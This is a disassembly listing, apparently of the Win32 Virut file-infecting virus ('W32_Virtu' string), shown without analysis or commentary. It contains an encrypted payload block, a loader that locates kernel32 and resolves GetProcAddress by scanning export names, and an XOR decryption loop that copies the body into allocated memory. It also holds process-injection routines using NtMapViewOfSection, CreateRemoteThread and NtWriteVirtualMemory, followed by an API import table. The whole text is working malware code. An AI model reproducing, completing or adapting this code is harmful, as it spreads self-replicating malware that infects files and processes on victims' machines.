		dd 42E03754h, 23B0F80Bh, 0ABD98417h, 0C33821D5h, 0FA424202h
		dd 99F18E5Ch, 0AC6F77C3h, 0B8B6B2D7h, 36E4AF75h, 2BD60078h
		dd 0BA8A62B2h, 0FDB5B4ADh, 3C9AEF1Bh, 307EC0C0h, 0D017C1A0h
		dd 1466597Eh, 38F93245h, 6C747EDCh, 93492D58h, 299ACF91h
		dd 6E724679h, 3BD7AC91h, 114F2E64h, 89E69BBh, 9391AAF2h
		dd 66F89B6Bh, 3AFA4332h, 0F3497861h, 0E2C5001Fh, 0CEB8897Ch
		dd 7C6BD0DAh, 79704B69h, 9300644Eh, 7AFB5B07h, 0CBD42B73h
		dd 0BE07696Bh, 224FF351h, 8BD93C72h, 3DD39DCAh,	6BBB669Fh
		dd 8DC20B4Dh, 2F1E9DABh, 0EB5ACD52h, 993EB9F3h,	874E346Eh
		dd 451369Bh, 0F32D6056h, 0DC5DBF82h, 26E2F5BDh,	583054D8h
		dd 41007B9Ah, 0B812037Ah, 9DF3AEF1h, 0B98BF7DDh, 1457659Dh
		dd 0DB8C6F8Bh, 35C97C10h, 162BC64Bh, 4A356870h,	56F8007Ah
		dd 0B561A295h, 13762CDBh, 66D30774h, 0C6830EDEh, 89ACD4BAh
		dd 118040D5h, 0A1C2D515h, 0E1A03742h, 0E7D0DB67h, 0DCD6388Bh
		dd 0B77DF053h, 0A4E6A3B7h, 625929F9h, 684035BFh, 84F12923h
		dd 6274F26h, 2505E5EFh,	878D2382h, 0BB18F784h, 1E3E5E8Dh
		dd 0C5ACA9C6h, 0F5C1D4F5h, 9D38B43Eh, 0C83908DFh, 0FC3D2153h
		dd 9AD1673Ah, 0B5E32AC5h, 2735698h, 6D0E906Fh, 0E47B959Eh
		dd 66D5ED0Ch, 89E5F843h, 750F0B0Eh, 0B0162185h,	0D9EE5865h
		dd 6AFFCE05h, 52E5E5EAh, 0BC93A77Bh, 6D3372C6h,	70416BB1h
		dd 372C394Dh, 0D80E8BA9h, 62122773h, 6A029D4Fh,	0CE98AFEBh
		dd 70048A02h, 0E7B1702Fh, 0E0293D02h, 1586D96Bh, 308E4D0Dh
		dd 27F77D1Ah, 0CD55A2D2h, 0B3ACB3D0h, 0D7FD49C7h, 42CB76E3h
		dd 19F1DC25h, 0C570663Dh, 478F0B2Ah, 0D76563FEh, 0C9280026h
		dd 6F329E4Dh, 0A5B52FADh, 516D867h, 0CD0B9B22h,	2A849807h
		dd 1B0B9B11h, 185C5E1Eh, 21ED2D03h, 5FC1B08h, 6DC54EC2h
		dd 0D2DAD6ADh, 6AE21D1Dh, 9EEB45F6h, 93324036h,	0A525ACBCh
		dd 79376B5Eh, 412615F7h, 0ECC08B60h, 98F5EA50h,	4E8426A2h
		dd 7EDA207Fh, 789AD44Ch, 7724AD11h, 0D5BAF85Dh,	7B76A76Fh
		dd 828E320h, 1E721C96h,	727378D9h, 3BF8BAFEh, 89A552EEh
		dd 0BC91CA01h, 0B7655FB6h, 7318E34Fh, 838CC5E5h, 9EB5DC2Dh
		dd 0C956DBA9h, 0D3210E07h, 0D0975594h, 2CE8485Eh, 1FE0339Eh
		dd 648F6F30h, 0AEA84E37h, 4644EA67h, 0E49D4281h, 0F4FF41A5h
		dd 774AE7A0h, 0DBF327A1h, 0B319CA45h, 33EEBF55h, 0F9B2BC3Ch
		dd 0F7BA7075h, 44DF9201h, 52B14E69h, 0B875F330h, 7F405B57h
		dd 0BC61CE5Dh, 0EC75702Eh, 0C276D1F7h, 0A272376Eh, 0E53C703h
		dd 0E266ED89h, 354EA055h, 77CA267Dh, 0A0823504h, 0FD12558Fh
		dd 44F1D2FBh, 77E0217Eh, 9A314558h, 75041D1Bh, 45DCB9D3h
		dd 9B28004Dh, 0C14E199h, 31368C7h, 8518CE9Fh, 9BBD9BB4h
		dd 92F86999h, 0D9713BC2h, 94189634h, 5BDDD5E4h,	9DBF552Ah
		dd 28392C6h, 8D647215h,	0FD265E41h, 0E6A3FF66h,	9717B203h
		dd 827D8CEEh, 3D387F99h, 79052EFh, 0E288045Eh, 36E6B24Fh
		dd 0BB586CAh, 6099186Bh, 2BB4D95Eh, 0C93A88C0h,	582EB735h
		dd 47FBC8DBh, 0C271BC87h, 0B596133Fh, 0FBB3105Bh, 72B2484Ch
		dd 0F1E156Eh, 46C5CC50h, 69B10F22h, 204582B2h, 0DC1D0515h
		dd 7A128AEh, 2BC13966h,	0E32E0D60h, 0E84B7951h,	4480A5ECh
		dd 0A9182A87h, 9639A00Eh, 0AF0DB5Ch, 23BF1E05h,	0E73CD13Fh
		dd 0DAEAB955h, 0F7AF4199h, 0F13BF82Fh, 0DB90D535h, 5641DCE9h
		dd 0D08AB06Bh, 22ADBEA2h, 26DF63DFh, 0B85F8F23h, 0A45C12DDh
		dd 0B1776329h, 7DCC1566h, 0A915F7ACh, 57DB0584h, 8EA06D0Fh
		dd 0AF44C1F4h, 9E7D1C28h, 78FC7CCFh, 8D3E73A8h,	0EFCF3A25h
		dd 0B3901E31h, 0F7D3B46Eh, 76D9CA76h, 0F9186DA1h, 69289772h
		dd 39AEEA71h, 0EEC1C904h, 81729CE0h, 1A502BD9h,	0E11C6287h
		dd 0EC3DF1C1h, 3AD1470Bh, 8D60D862h, 0B503A0Bh,	93B136D1h
		dd 80A59DAEh, 77248EABh, 18747548h, 0DD618FC4h,	7C1C668Bh
		dd 91CF43D6h, 91CCD842h, 2C682219h, 886FF610h, 29ED166Dh
		dd 0DEEEF3E7h, 0C062DD45h, 0FEB66071h, 2C851565h, 2F74BF1Dh
		dd 731ADDB6h, 599A477h,	0A2C5031Bh, 0BC1D65A3h,	331419E0h
		dd 5340D90Ah, 0BADEC806h, 226B65D5h, 913E7B4Fh,	5D073C7Bh
		dd 22A7FBA5h, 89964FD2h, 917F7AB5h, 0B4B8ABCAh,	1D0368A2h
		dd 903346BFh, 1B6FD70Bh, 172F0BCFh, 6FFA1650h, 0E2EB335Bh
		dd 0EB42F516h, 8B217FC7h, 63C3A3D4h, 69C663A0h,	0E249CD67h
		dd 0D0204B4Ah, 0E1FF7887h, 0CFD21521h, 8BAC8723h, 7512049Fh
		dd 8DA3FD7Ch, 0FB76DE59h, 47E9A8D3h, 0DA975E54h, 0A0EAE18Fh
		dd 0B24E9014h, 0F486B284h, 7BCBA022h, 0FB6F52C9h, 0D2C272A1h
		dd 7D50BC67h, 5FFB25EEh, 6137B106h, 4C318701h, 5456BA0h
		dd 0C38C1813h, 0F396B067h, 0EEC6E152h, 0BF38318Ch, 4858D434h
		dd 6AFD9218h, 22B652EBh, 4DA14FF5h, 848BCD07h, 2C878D73h
		dd 0CFC3DA99h, 0E88979E5h, 63429D12h, 0D68E085Dh, 0ADA3FD44h
		dd 0D5DE847Bh, 0A3226917h, 3FE019A5h, 0D5276F6Eh, 0D74D192Bh
		dd 50609EDBh, 3A0EB76Eh, 4A69A1F0h, 66E7DDEDh, 5D80C995h
		dd 0DBBF12B5h, 0E22DC790h, 7138436Eh, 0C8402763h, 95895A47h
		dd 0E7E259A5h, 0B57327CFh, 7CAB1653h, 0A960C1BBh, 0EF2F340Fh
		dd 83DA521Ah, 8156D31Ah, 77F554BBh, 377AD15Ah, 81B5561Eh
		dd 0CCB21D3Ch, 3B3692A4h, 0C32DF95Bh, 575846B5h, 2BBA2279h
		dd 0D26773A6h, 691A7287h, 0DB5DEC80h, 915EEE05h, 0DD2FEF8Fh
		dd 1C10B493h, 41E97008h, 194BE6Ah, 0ED1DC880h, 0ACE7FC27h
		dd 3E63544Bh, 6C76A42Dh
		dd 0DE9FE930h, 100DA714h, 3203512Bh, 8BF34A2Ch,	0AAD59AD1h
		dd 14FE5A3Bh, 8603F541h, 832F29F3h, 0D26D93DFh,	613158B4h
		dd 0DFBB0A1Eh, 0FC7B0016h, 438E5E0Dh, 0E9586B5Dh, 83DB7281h
		dd 0BE645D18h, 3C0103AEh, 0CE5099CDh, 0DEC3B1A6h, 0CFEFFAEEh
		dd 0EE080A0Ah, 82E5C6C1h, 3D1E0B8Dh, 0A4521A19h, 998D6712h
		dd 0E728F8ADh, 0C86AD46Fh, 4843A6EAh, 1BF59840h, 0B42CD41h
		dd 0C3762946h, 76BD25C8h, 0E722D68Fh, 5DAF57Dh,	0F8A9034Fh
		dd 1D74D50Dh, 0F69BB939h, 8E678A1h, 178A3D86h, 47E73DA8h
		dd 8A3330CEh, 8116D636h, 680324F1h, 0CC70E322h,	0FB2BC152h
		dd 0EC5AF4F8h, 33C19B9Ch, 3F6FD6A8h, 4FDCDE4h, 2136D8D8h
		dd 14F83A0Dh, 238B5E51h, 2A8CDAF0h, 0AAC1E3A3h,	3810EBE9h
		dd 75D63AC2h, 0C2E086D5h, 3589EEB2h, 208393C8h,	0FE316224h
		dd 0FF05DC08h, 44FC23CCh, 16925C10h, 0A8DB385Eh, 1D1D7EA5h
		dd 0D85462FDh, 0BAC440Eh, 917D3FEAh, 0B4E52A3Ah, 0F672D8D5h
		dd 2523D02h, 69C70D9Dh,	8D98AC7Eh, 203974BDh, 0B09C6B04h
		dd 8FCA1EF4h, 79ED65C1h, 1A99F8A1h, 0C8C56299h,	0A3C0B173h
		dd 0EC871E77h, 60694787h, 0B8FA156Ch, 0B1C16440h, 0A7828204h
		dd 0E045A2CEh, 0A878FCAh, 48EE993Dh, 903EBC5Dh,	3BC97D60h
		dd 293E2663h, 40642349h, 70510204h, 2E4EA50Ch, 6FD651D8h
		dd 55F0A6D5h, 4D5B609Ch, 14D8280Bh, 0DB67C2D0h,	8E0BFEBAh
		dd 8D02EA58h, 0C783DA48h, 6C49AB0Dh, 62CDFBC3h,	66759001h
		dd 0B475E452h, 0C6B1EE4Eh, 0C4142143h, 0B36379EBh, 242EF43Ch
		dd 5EEAC2A5h, 51F48A88h, 0BA434FDEh, 3E2CEE13h,	0DDF7D5B3h
		dd 0ABB633D2h, 17C46230h, 32265892h, 6E756733h,	0D4E65314h
		dd 9A280B9Fh, 0C325E1C8h, 7EB977F5h, 9D6BE9BBh,	0FB0C5242h
		dd 0A7CF85BBh, 7AB559C3h, 0C04BFB10h, 0F5BAD898h, 0DEDB25B3h
		dd 25697B84h, 1DDDC50Ch, 5BA94B9Eh, 40608935h, 44F4C9B0h
		dd 0BB34CB8Dh, 8AB30241h, 2F0AB33Eh, 1D82CA65h,	4E279A60h
		dd 0D506AFE8h, 1D4A902Bh, 56A43E18h, 0C244C36Eh, 56EA47D5h
		dd 80AB2F07h, 0AE97200Ch, 81355F75h, 0FB91410Dh, 0E4AA6ED8h
		dd 6FDD6966h, 5BBA65ADh, 3F46F231h, 46A8DF16h, 24E2D462h
		dd 226BD623h, 0AC44228Ah, 8F6735C9h, 65B489F6h,	0E426565Ah
		dd 0FDCF629Fh, 0DC51DFFh, 85E5A73Dh, 9DDE5E4h, 0A4395699h
		dd 0A5A3B96Ah, 1DBFC732h, 28524F50h, 57DC1FFBh,	0CF5D40C8h
		dd 3B81EF60h, 5DAB0418h, 0D2CA4EF1h, 737A4F9Fh,	886E04FBh
		dd 98F506B1h, 2F301BA1h, 6761143Ah, 0D327046Bh,	6848B866h
		dd 57617C64h, 0F8B806A2h, 961CCC16h, 0CA715047h, 5132C07Ch
		dd 547D103Eh, 0F4FA4F86h, 6120F1E6h, 39D70570h,	32118793h
		dd 4BB32DC3h, 54FCAA79h, 0AA3A5B42h, 0D63E2706h, 3DED8EBh
		dd 0BC519419h, 0DC8F570h, 0A923BDA6h, 7A2552C9h, 13C25FF9h
		dd 0B227709Eh, 0E31E9474h, 0A9699AC0h, 1253E99Fh, 5B726D9Ch
		dd 39BFCCC8h, 0F79180C8h, 5C5CF093h, 0B3A401ABh, 6F21F21Bh
		dd 9E6D8A31h, 7AF1BE63h, 0F9790190h, 6107740Bh,	95AE5393h
		dd 33DFD592h, 0EACB5A98h, 677C21E1h, 5BF9EC37h,	5D642958h
		dd 0E336DFF8h, 0EA5B8578h, 0B900ED4Dh, 5716963Bh, 0D9ABCC47h
		dd 675C53F1h, 7B962F89h, 6E9050B5h, 0CEB9136Bh,	6CB1DBEDh
		dd 245C1549h, 77E82FA3h, 4AD36F59h, 0FC79A1D0h,	5E7A777Dh
		dd 0EE797458h, 328B94D6h, 4FCC4F5Ah, 0CE0EAA31h, 2E7D500Bh
		dd 0F7E86E03h, 77005E95h, 64BA413Eh, 380C62B0h,	9E0FE220h
		dd 0BD498825h, 1E92CFEh, 4645314Fh, 570F0027h, 0C8FBA8A5h
		dd 97FF103h, 663CEDB1h,	0EBBB13BDh, 9DCBDBDFh, 89A6ED24h
		dd 0D96D7DE7h, 0F63CB774h, 0D6F781F0h, 0AD5DA8B0h, 2C68A0D6h
		dd 0B90A1ABAh, 42D26790h, 0BF13B81h, 298B58F7h,	0D16894F7h
		dd 0E62CFEB7h, 9559F0EDh, 5663354Eh, 15EE67F6h,	8ECBDC3Ch
		dd 325502ADh, 18963380h, 8CA0592Ch, 7673D162h, 57E4CC6Eh
		dd 0EAF9D015h, 0B561312Dh, 45A5E93h, 4C13E9B7h,	69B7C315h
		dd 31940079h, 0FB874F03h, 0E7B49511h, 3E51B45Fh, 0E219F20h
		dd 93D9E565h, 0FB81C0FEh, 0C2C5AC90h, 5A437943h, 325FFBFCh
		dd 41B14A34h, 82EF5152h, 1BD19538h, 36C07971h, 0E5603161h
		dd 0C2B567D3h, 91A857F6h, 0E9AC64D5h, 0B85F669Eh, 30A0FDD3h
		dd 95431FFh, 0D6D54E8Ah, 7270736Dh, 3AD8B780h, 62AE5B6Ch
		dd 0FF6DB073h, 0D1A35679h, 0A471D75Eh, 53AAF116h, 0DE7CFA2Dh
		dd 0E76E0E1Ah, 5A8D49A7h, 0C9F0ED0Dh, 0B7D2B8FAh, 67998368h
		dd 0DB1112C0h, 59877157h, 0EFD64B76h, 5C205218h, 0A77BB957h
		dd 79AB8868h, 5CD79B78h, 0D9A0C797h, 2862B3Eh, 85558665h
		dd 5DB87CA5h, 5B0B245h,	0CE7DD59Ah, 86E87D94h, 0E51AA379h
		dd 463ED88h, 6316DA17h,	406E4F02h, 8CE8B86Dh, 0B2651CEAh
		dd 0C74967D0h, 2237D99Eh, 0F4291E0Fh, 0C34AB689h, 795DBC2Eh
		dd 7223F255h, 1ADF7B89h, 0FCC92238h, 27603ED9h,	0F15508A3h
		dd 0A452ED91h, 0E7A030F6h, 65149FE3h, 62E54ED8h, 1AB0A8FCh
		dd 0EA48E7C7h, 5D0B0BC7h, 9EBF82E0h, 0EA5C604Ah, 0E5705740h
		dd 0BA461EB5h, 21138F6Bh, 0ECCA38A4h, 67559FD5h, 2E1B541Ah
		dd 0FDD3E81Ah, 7C752E3Ah, 0A90ACAE3h, 5C4829Dh,	913111h
		dd 70766DD0h, 8059570Fh, 0D30806E5h, 0EC05A99Eh, 0E1C3131h
		dd 1021835Ah, 26E94051h, 8A0D9A2Eh, 2774CFE6h, 0C5FE66E7h
		dd 31776AADh, 6F1062A9h, 56A870Eh, 620CC2ABh, 150FF4B7h
		dd 0D5D48679h, 0E31793D9h, 2F139F8Eh, 0AB2696BCh, 0D019F0DBh
		dd 6086C525h, 0EF8E6E92h, 0BECE215Ch, 0F200FA26h, 94DEC7A4h
		dd 52667ABAh, 2403F247h, 49E7D386h, 6B3B4107h, 2E6AE170h
		dd 0A483E6AFh, 6A6A1B1Eh, 0B1938D4Fh, 0AD64ACF5h, 0B4BDD650h
		dd 0DAA49547h, 8AC7DF46h, 97E38286h, 238C579Fh,	0D506DA98h
		dd 810022E9h, 60D0C2D1h, 75ED456Ah, 0CE345D16h,	468CDAFEh
		dd 7B79F8ACh, 0A0BFF0A9h, 8BC034F5h, 0E3D6D99Eh, 0D2B7C0C3h
		dd 0E0BAF47Ah, 0FA59FE92h, 0A5521857h, 12A812C5h, 0DFFB987Ah
		dd 0BE655A13h, 33B90891h, 4F6767CEh, 0C6F866AFh, 0DEB33DD2h
		dd 6D3D004Fh, 0EFBE13D2h, 7C8DDB85h, 232AB6B7h,	0BC18E458h
		dd 9E4987CBh, 0CB7F1B2Ah, 0FE247779h, 0AD8DD6F8h, 0D4D581B3h
		dd 5F127ADFh, 0E632D5DCh, 0EFA26823h, 0D0B9A9DEh, 777BE1B7h
		dd 0AB8661F8h, 6E0A925Eh, 9A1AAFFCh, 712F4A08h,	34D49747h
		dd 0FECE646Eh, 1A0E1FE1h, 6D3E58F4h, 0B02492D2h, 0D31EBF5Bh
		dd 0A930BA12h, 23D2AC03h, 0D4C977D2h, 6B40004Dh, 92BE957Bh
		dd 0FE63D5F1h, 6E8227E5h, 0D46AF290h, 0EC200611h, 3C701FAh
		dd 12371D41h, 0AEC9DF03h, 0A349690Bh, 8EC77252h, 9CF52139h
		dd 0C7440DF3h, 24DC2573h, 5539943Ah, 0B4862BC7h, 0F5905877h
		dd 0E6286188h, 80ADDC19h, 56E427B1h, 49048F01h,	0B77C524Eh
		dd 0A044246h, 0F77342A7h, 28B3B91Ah, 1953570h, 0CD7AD45Bh
		dd 0A042C5DEh, 67C9F817h, 1495A6D9h, 74308025h,	0B4E707ACh
		dd 3A2B0276h, 5B2DA2FAh, 32CF5BC2h, 0F6D4695Bh

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

		call	$+5
		push	ebp
		mov	ebx, [esp+8]
		mov	ebp, [esp+8+var_4]
		sub	[esp+8+var_4], 1EB0h
		and	ebx, 0FFFFF000h
		sub	ebp, 401005h

loc_491022:				; CODE XREF: start+3Dj
		cmp	dword ptr [ebx+4Eh], 73696854h
		jnz	short loc_491037
		mov	eax, [ebx+3Ch]
		add	eax, ebx
		cmp	word ptr [eax],	4550h
		jz	short loc_49103F

loc_491037:				; CODE XREF: start+29j
		sub	ebx, 100h
		jmp	short loc_491022
; ---------------------------------------------------------------------------

loc_49103F:				; CODE XREF: start+35j
		mov	edx, [eax+78h]
		add	edx, ebx
		mov	esi, [edx+20h]
		mov	ecx, [edx+18h]
		add	esi, ebx
		push	ecx

loc_49104D:				; CODE XREF: start:loc_491074j
		lodsd
		add	eax, ebx
		cmp	dword ptr [eax-1], 74654700h
		jnz	short loc_491074
		cmp	dword ptr [eax+3], 636F7250h
		jnz	short loc_491074
		cmp	dword ptr [eax+7], 72646441h
		jnz	short loc_491074
		cmp	dword ptr [eax+0Bh], 737365h
		jz	short loc_491079

loc_491074:				; CODE XREF: start+57j	start+60j ...
		loop	loc_49104D
		pop	ecx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_491079:				; CODE XREF: start+72j
		sub	[esp+0Ch+var_C], ecx
		mov	esi, [edx+24h]
		pop	ecx
		add	esi, ebx
		movzx	eax, word ptr [esi+ecx*2]
		mov	edi, [edx+1Ch]
		add	edi, ebx
		mov	esi, [edi+eax*4]
		add	esi, ebx
		call	near ptr loc_49109F+2
		inc	ebx
		insb
		outsd
		jnb	short near ptr loc_4910FD+2
		dec	eax
		popa
		outsb
		db	64h
		insb

loc_49109F:				; CODE XREF: start+90p
		add	gs:[ebx-1], dl
start		endp ; sp-analysis failed

		setalc
		mov	dword ptr ss:loc_402407[ebp], eax
		call	near ptr loc_4910BB+1
		inc	ebx
		jb	short loc_491117
		popa
		jz	short loc_49111A
		inc	ebp
		jbe	short near ptr loc_49111C+1
		outsb
		jz	short near ptr loc_4910FA+2

loc_4910BB:				; CODE XREF: zbox2z3f:004910AAp
		add	[ebx-1], dl
		setalc
		mov	dword ptr ss:(loc_40240A+1)[ebp], eax
		call	sub_4910D7
		inc	edi
		db	65h
		jz	short loc_49111A
		popa
		jnb	short sub_491145
		inc	ebp
		jb	short near ptr sub_491145+1
		outsd
		jb	short $+2

; =============== S U B	R O U T	I N E =======================================



sub_4910D7	proc near		; CODE XREF: zbox2z3f:004910C5p

; FUNCTION CHUNK AT 00491155 SIZE 0000008D BYTES
; FUNCTION CHUNK AT 00491271 SIZE 000000DD BYTES

		push	ebx
		call	esi
		mov	dword ptr ss:(loc_40240D+2)[ebp], eax
		call	sub_49112A
		test	eax, eax
		jz	short loc_49110A
		push	eax
		call	dword ptr ss:(loc_40240D+2)[ebp]
		test	eax, eax
		jnz	short loc_491104
		lea	eax, [ebp+401155h]

loc_4910FA:				; CODE XREF: zbox2z3f:004910B9j
		mov	dl, [eax-1]

loc_4910FD:				; CODE XREF: start+98j
		call	sub_491145
		jmp	short loc_491155
; ---------------------------------------------------------------------------

loc_491104:				; CODE XREF: sub_4910D7+1Bj
					; sub_4910D7+E7j ...
		call	dword ptr ss:loc_402407[ebp]

loc_49110A:				; CODE XREF: sub_4910D7+10j
		pop	ebp
		retn
sub_4910D7	endp

; ---------------------------------------------------------------------------

loc_49110C:				; CODE XREF: sub_49112A+2p
					; sub_4910D7:loc_4912E1p
		pop	edx
		push	0
		push	0
		push	0
		push	0
; ---------------------------------------------------------------------------
		db 68h,	1
; ---------------------------------------------------------------------------

loc_491117:				; CODE XREF: zbox2z3f:004910B0j
		add	[eax+eax], al

loc_49111A:				; CODE XREF: zbox2z3f:004910B3j
					; zbox2z3f:004910CBj
		mov	eax, esp

loc_49111C:				; CODE XREF: zbox2z3f:004910B6j
		push	0
		push	eax
		push	0Ch
		mov	eax, esp
		jmp	edx
; ---------------------------------------------------------------------------
		push	esi
		push	esp
		pop	edi
		xor	eax, [eax]

; =============== S U B	R O U T	I N E =======================================



sub_49112A	proc near		; CODE XREF: sub_4910D7+9p
					; zbox2z3f:loc_491CDCp
		xor	ecx, ecx
		call	loc_49110C
		lea	edx, [ebp+401125h]
		push	edx
		push	ecx
		push	ecx
		push	eax
		call	dword ptr ss:(loc_40240A+1)[ebp]
		add	esp, 20h
		retn
sub_49112A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_491145	proc near		; CODE XREF: zbox2z3f:004910CFj
					; sub_4910D7:loc_4910FDp ...
		mov	dh, dl
		mov	ecx, 12B2h

loc_49114C:				; CODE XREF: sub_491145+Cj
		xor	[eax], dl
		inc	eax
		add	dl, dh
		loop	loc_49114C
		retn
sub_491145	endp

; ---------------------------------------------------------------------------
		db 0C8h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4910D7

loc_491155:				; CODE XREF: sub_4910D7+2Bj
		and	dword ptr [ebp+401480h], 0
		and	dword ptr [ebp+401484h], 0
		and	dword ptr ss:loc_401488[ebp], 0
		push	edi
		mov	byte ptr [ebp+401262h],	1
		mov	dword ptr ss:(loc_402412+1)[ebp], esi
		lea	esi, loc_4014A9[ebp]
		xor	ecx, ecx
		lea	edi, loc_402423[ebp]
		mov	cl, 1Ch
		call	sub_49148C
		pop	edi
		call	dword ptr ss:(loc_40245A+1)[ebp]
		shr	eax, 1Fh
		jz	loc_491271
		mov	eax, [edi+14h]
		push	40h
		add	eax, ebx
		push	8001000h
		mov	dword ptr ss:(loc_40241A+1)[ebp], eax
		push	5839h
		push	0
		call	dword ptr ss:(loc_402489+2)[ebp]
		test	eax, eax
		jz	loc_491104
		xchg	eax, edi
		lea	esi, sub_401000[ebp]
		mov	ebp, edi
		mov	ecx, 60Fh
		sub	ebp, offset sub_401000
		lea	edx, [ebp+4011E2h]
		rep movsd
		jmp	edx
; END OF FUNCTION CHUNK	FOR sub_4910D7
; ---------------------------------------------------------------------------
		sub	esp, 20h
		mov	edi, esp
		push	8
		xor	eax, eax
		pop	ecx
		lea	edx, [ebp+4018D1h]
		rep stosd
		mov	edi, esp
		mov	[edi+10h], edx
		inc	byte ptr [edi+1Ch]
		push	edi
		push	10003h
		call	dword ptr [ebp+40241Bh]
		add	esp, 20h
		test	eax, eax
		jz	loc_491104
		xchg	eax, edi
		push	0
		push	1
		push	80000400h
		push	10000h
		call	dword ptr [ebp+40241Bh]
		test	eax, eax
		jz	loc_491104
		push	0
		push	eax
		push	40000h
		push	0
		shr	eax, 0Ch
		push	edi
		push	1
		push	eax
		push	10001h
		call	dword ptr [ebp+40241Bh]
		push	1000Ah
		call	dword ptr [ebp+40241Bh]
		call	sub_491261
		jmp	loc_491104

; =============== S U B	R O U T	I N E =======================================



sub_491261	proc near		; CODE XREF: zbox2z3f:00491257p
					; sub_491261+Dj
		push	1
		pop	ecx
		jecxz	short locret_491270
		push	0Ah
		call	dword ptr ss:loc_402483[ebp]
		jmp	short sub_491261
; ---------------------------------------------------------------------------

locret_491270:				; CODE XREF: sub_491261+3j
		retn
sub_491261	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4910D7

loc_491271:				; CODE XREF: sub_4910D7+C0j
		cmp	dword ptr ss:(loc_40243A+1)[ebp], 0
		jz	loc_491104
		call	near ptr loc_491288+1
		dec	esi
		push	esp
		inc	esp
		dec	esp
		dec	esp

loc_491288:				; CODE XREF: sub_4910D7+1A7p
		add	bh, bh
		xchg	eax, ebp
		dec	edi
		and	al, 40h
		add	[ebp+401637B5h], cl
		add	[ebx], dh
		leave
		lea	edi, (loc_40248F+4)[ebp]
		mov	cl, 9
		xchg	eax, ebx
		call	sub_49148C
		cmp	dword ptr ss:loc_4024B3[ebp], 0
		jz	loc_491104
		mov	eax, dword ptr ss:(loc_402494+3)[ebp]
		push	dword ptr [eax+1]
		pop	dword ptr ss:(loc_4023C0+1)[ebp]
		mov	eax, dword ptr ss:(loc_402499+2)[ebp]
		push	dword ptr [eax+1]
		pop	dword ptr ss:(loc_4023C6+1)[ebp]
		mov	ecx, dword ptr ss:(loc_40249C+3)[ebp]
		jecxz	short loc_4912E1
		push	dword ptr [ecx+1]
		pop	dword ptr ss:(loc_4023D3+1)[ebp]

loc_4912E1:				; CODE XREF: sub_4910D7+1FFj
		call	loc_49110C
		lea	edx, dword_40149F[ebp]
		push	edx
		push	5839h
		push	0
		push	4
		push	eax
		push	0FFFFFFFFh
		call	dword ptr ss:loc_40242B[ebp]
		add	esp, 20h
		push	5839h
		mov	edx, esp
		push	0
		mov	ecx, esp
		push	4
		push	0
		push	2
		push	edx
		push	0
		push	5839h
		push	0
		push	ecx
		push	0FFFFFFFFh
		push	eax
		call	dword ptr ss:(loc_4024A1+2)[ebp]
		pop	edi
		pop	ecx
		test	edi, edi
		jz	loc_491104
		lea	esi, sub_401000[ebp]
		mov	ecx, 60Fh
		mov	ebp, edi
		rep movsd
		sub	ebp, offset sub_401000
		lea	eax, loc_40134E[ebp]
		jmp	eax
; END OF FUNCTION CHUNK	FOR sub_4910D7
; ---------------------------------------------------------------------------
		dw 958Dh
		dd offset loc_401785+4
		dd 6395FF52h, 0E8004024h, 16h
aLookupprivileg	db 'LookupPrivilegeValueA',0
		dw 0FF50h
		dd 40241395h, 17858900h, 50004024h, 6A206A54h, 0A795FFFFh
		dd 85004024h, 3F755FC0h, 56026A96h, 6AD48B56h, 11E85201h
		dd 53000000h, 62654465h, 72506775h, 6C697669h, 656765h
		dd 1795FF56h, 8B004024h, 565656C4h, 0FF575650h,	40249395h
		dd 10C48300h, 795FF57h,	6A004024h, 0FF026A00h, 40243B95h
		dd 128B900h, 2B970000h,	240C89E1h, 95FF5754h, 402473h
		dd 0A583F633h, 4024F7h,	0FF575400h, 40247795h, 74C08500h
		dd 0FE83465Ch, 0FFEE7204h, 6A082474h, 0FF2A6A00h, 40246F95h
		dd 74C08500h, 0E4E893DCh, 33000003h, 30E391C9h,	24F78539h
		dd 28750040h, 0C3EC181h, 54500000h, 50515650h, 95FF5350h
		dd 402433h, 7459C085h, 2474FF0Fh, 0F7858F08h, 0E8004024h
		dd 0FFFFFE09h, 795FF53h, 0EB004024h, 28C48198h,	57000001h
		dd 240795FFh, 91E90040h, 90FFFFFCh, 585858h, 1839h, 0BF4h
		dd 3 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_49148C	proc near		; CODE XREF: sub_4910D7+B1p
					; sub_4910D7+1C9p ...
		push	ecx
		push	esi
		push	ebx
		call	dword ptr ss:(loc_402412+1)[ebp]
		stosd
		pop	ecx

loc_491497:				; CODE XREF: sub_49148C+Ej
		lodsb
		test	al, al
		jnz	short loc_491497
		loop	sub_49148C
		retn
sub_49148C	endp

; ---------------------------------------------------------------------------
aW32_virtu	db 'W32_Virtu',0
aLstrlen	db 'lstrlen',0
aCreatefilea	db 'CreateFileA',0
aCreatefilemapp	db 'CreateFileMappingA',0
aCreateprocessa	db 'CreateProcessA',0
aCreateremoteth	db 'CreateRemoteThread',0
aCreatethread	db 'CreateThread',0
aCreatetoolhe_0	db 'CreateToolhelp32Snapshot',0
aExitthread	db 'ExitThread',0
aGetfileattribu	db 'GetFileAttributesA',0
aGetfilesize	db 'GetFileSize',0
aGetfiletime	db 'GetFileTime',0
aGetmodulehandl	db 'GetModuleHandleA',0
aGettempfilenam	db 'GetTempFileNameA',0
aGettemppatha	db 'GetTempPathA',0
aGetversion	db 'GetVersion',0
aGetversionexa	db 'GetVersionExA',0
aLoadlibrarya	db 'LoadLibraryA',0
aMapviewoffile	db 'MapViewOfFile',0
aOpenfilemappin	db 'OpenFileMappingA',0
aOpenprocess_0	db 'OpenProcess',0
aProcess32fir_0	db 'Process32First',0
aProcess32nex_0	db 'Process32Next',0
aSetfileattribu	db 'SetFileAttributesA',0
aSetfiletime	db 'SetFileTime',0
aSleep		db 'Sleep',0
aUnmapviewoffil	db 'UnmapViewOfFile',0
aVirtualalloc	db 'VirtualAlloc',0
aWritefile	db 'WriteFile',0
aNtadjustprivil	db 'NtAdjustPrivilegesToken',0
aNtcreatefile	db 'NtCreateFile',0
aNtcreateproces	db 'NtCreateProcess',0
aNtcreateproc_0	db 'NtCreateProcessEx',0
aNtmapviewofsec	db 'NtMapViewOfSection',0
aNtopenprocesst	db 'NtOpenProcessToken',0
aNtprotectvirtu	db 'NtProtectVirtualMemory',0
aNtwritevirtual	db 'NtWriteVirtualMemory',0
